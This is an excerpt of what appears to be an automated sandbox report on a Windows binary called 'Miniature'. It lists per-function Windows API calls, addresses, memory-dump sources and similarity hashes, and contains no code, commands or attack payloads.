                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C78145
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C78153
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C781A9
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C781CF
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C781D2
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00C781F3
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 00C781FC
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C78216
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C78224
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C80E99
                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C80ED5
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C80F6D
                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C80FA8
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C178B1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: GetStockObject.GDI32(00000011), ref: 00C178C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C178CF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CA4BB0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CA4BBD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CA4BC8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CA4BD7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CA4BE3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C4DB23: _free.LIBCMT ref: 00C4DB4C
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DBAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DBB8
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DBC3
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC17
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC22
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC2D
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC38
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C7E328
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C7E32F
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7E345
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C7E34C
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7E390
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C7E36D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00C81322
                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00C81334
                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C81342
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C81350
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C8135F
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C8136F
                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00C81376
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C9281D
                                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C9283E
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C9284F
                                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00C92938
                                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00C928E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7433E: _strlen.LIBCMT ref: 00C74348
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C8F669), ref: 00C93C9D
                                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00C92992
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C4042A
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C40446
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C4045D
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C4047B
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C40492
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C404B0
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C38649,00C38649,?,?,?,00C467C2,00000001,00000001,8BE85006), ref: 00C465CB
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C467C2,00000001,00000001,8BE85006,?,?,?), ref: 00C46651
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C4674B
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C46758
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C46761
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C46786
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C72A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9C785
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9C7CA
                                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C9C7F9
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9C853
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9C85F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ac4b6feae3e82aa449c1a73606f8feae711816006648f14c8d868e52770fcdf5
                                                                                                                                                                                                                                                                                            • Instruction ID: f967e6c40c740e5ea882a0c369aee9952e6c777f6f6a6fa57bacca74dbd40972
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac4b6feae3e82aa449c1a73606f8feae711816006648f14c8d868e52770fcdf5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB819D71108241AFCB14DF64C8C5E6ABBE5FF85308F14855CF4564B2A2CB31ED45DB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00C700A9
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C70150
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C70354,00000000), ref: 00C70179
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00C70354), ref: 00C7019D
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00C70354,00000000), ref: 00C701A1
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C701AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f42d7c214422aef0a2c8de2f056b4b0d75c79577a1ab3f40fc74543702553f53
                                                                                                                                                                                                                                                                                            • Instruction ID: 7e71ba3ac8d684dd2e2c34c94a4c4763e9ffabd47fa74f34d9a85d6f6c73c680
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f42d7c214422aef0a2c8de2f056b4b0d75c79577a1ab3f40fc74543702553f53
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B651D432610310EACF20AB65D899B6DB7A5AF46310F34D446F80EEF297DB709C40EB56
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00C89F2A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C89F4B
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C89F72
                                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00C89FCA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                                            • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                            • Opcode ID: 37eaa8451dcefc667224f3e315aee061a1f44c278b4534df041a30c533e6955c
                                                                                                                                                                                                                                                                                            • Instruction ID: 99b031cc01a5244218db95068fe0d0e4b2042d5d76e86166bd698ea84afbe355
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37eaa8451dcefc667224f3e315aee061a1f44c278b4534df041a30c533e6955c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE19231508340DFD714EF24C881AAAB7E0FF85318F18856DF89A8B2A2DB31DD45DB96
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C86F21
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C8707E
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00CB0CC4,00000000,00000001,00CB0B34,?), ref: 00C87095
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C87319
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00C11B35
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C11B99
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C11BB6
                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C11BC7
                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00C11C15
                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C53287
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11C2D: BeginPath.GDI32(00000000), ref: 00C11C4B
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C811B3
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C811EE
                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C8120A
                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C81283
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C8129A
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C812C8
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C6FBEF,00000000,?,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00CA8CA7
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00CA8CCD
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CA8D2C
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00CA8D40
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00CA8D66
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CA8D8A
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00C92D45
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8EF33: GetWindowRect.USER32(?,?), ref: 00C8EF4B
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C92D6F
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C92D76
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C92DB2
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C92DDE
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C92E3C
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cb37bdd49cf4633fb11c239613668a5296c0a36e029ba6649b9c9cab0570db24
                                                                                                                                                                                                                                                                                            • Instruction ID: a488de1620e59a2938bb48d3ff73b0bbab755ae59837c4b680945b5d31ffa184
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb37bdd49cf4633fb11c239613668a5296c0a36e029ba6649b9c9cab0570db24
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1531E272505315AFCB20DF14C849F9BB7A9FF85318F000919F49AA7191DB30EA49CBD2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C755F9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C75616
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C7564E
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7566C
